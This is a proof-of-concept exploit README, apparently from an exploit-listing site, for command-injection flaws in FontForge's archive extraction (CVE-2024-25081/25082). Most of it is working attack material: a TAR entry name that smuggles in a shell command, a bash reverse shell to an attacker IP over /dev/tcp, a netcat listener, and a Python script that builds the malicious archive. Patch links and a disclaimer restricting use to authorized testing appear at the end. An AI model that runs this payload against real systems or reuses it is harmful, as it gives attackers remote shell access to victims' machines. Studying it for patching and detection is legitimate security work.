## https://sploitus.com/exploit?id=1134A0B1-631D-58C1-8B67-4C5C5AC1661E
# โ ๏ธ FontForge RCE โ CVE-2024-25081 & CVE-2024-25082 - PoC
## ๐ Overview
Proof-of-concept exploit for two command injection vulnerabilities in **FontForge โค 20230101** (`Splinefont` component).
| CVE | Vector | Trigger |
|---|---|---|
| CVE-2024-25081 | Crafted filename | Direct file open |
| CVE-2024-25082 | Crafted archive filename | TAR/ZIP/GZ/BZ2 extraction |
This PoC targets **CVE-2024-25082** โ FontForge's automatic archive extraction passes filenames to a shell without sanitization, allowing a semicolon-delimited payload embedded in a TAR entry name to execute arbitrary commands.
---
## How It Works
FontForge supports opening font files directly from archives. When extracting a TAR archive, the `Splinefont` component constructs a shell command using the filename from the archive entry. Because the filename is **not sanitized**, a semicolon (`;`) in the entry name breaks out of the expected command and injects arbitrary shell instructions.
**Malicious TAR entry name:**
```
exploit.ttf;bash /tmp/s.sh;
```
When FontForge processes this archive, the shell interprets this as:
```
exploit.ttf ; bash /tmp/s.sh ;
```
---
## Environment
- **Vulnerable software:** FontForge โค 20230101
- **Platform:** Linux
- **Attacker listener:** `192.168.1.20:4444` (adjust as needed)
---
## ๐ Prerequisites
- Python 3 (standard library only, `tarfile` module)
- `netcat` on attacker machine
- FontForge โค 20230101 on target machine
---
## ๐ ๏ธ Proof of Concept
### 1. Start a netcat listener on your attacker machine
```bash
nc -lvnp 4444
```
### 2. Generate the malicious TAR archive
```bash
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh
# Build the malicious archive
python3 << 'EOF'
import tarfile, io
malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF
```
### 3. Open the archive in FontForge on the target
```bash
fontforge exploit.tar
```
A reverse shell will connect back to your listener.
---
## ๐ Patch
Fixed in FontForge post-20230101 via [PR #5367](https://github.com/fontforge/fontforge/pull/5367). Upgrade to the latest release.
- **Debian/Ubuntu:** `sudo apt upgrade fontforge`
- **Manual build:** pull latest from [fontforge/fontforge](https://github.com/fontforge/fontforge)
---
## ๐ Reference
- [NVD โ CVE-2024-25081](https://nvd.nist.gov/vuln/detail/CVE-2024-25081)
- [NVD โ CVE-2024-25082](https://nvd.nist.gov/vuln/detail/CVE-2024-25082)
- [FontForge fix PR #5367](https://github.com/fontforge/fontforge/pull/5367)
---
## โ๏ธ Disclaimer and Terms
This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.
- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.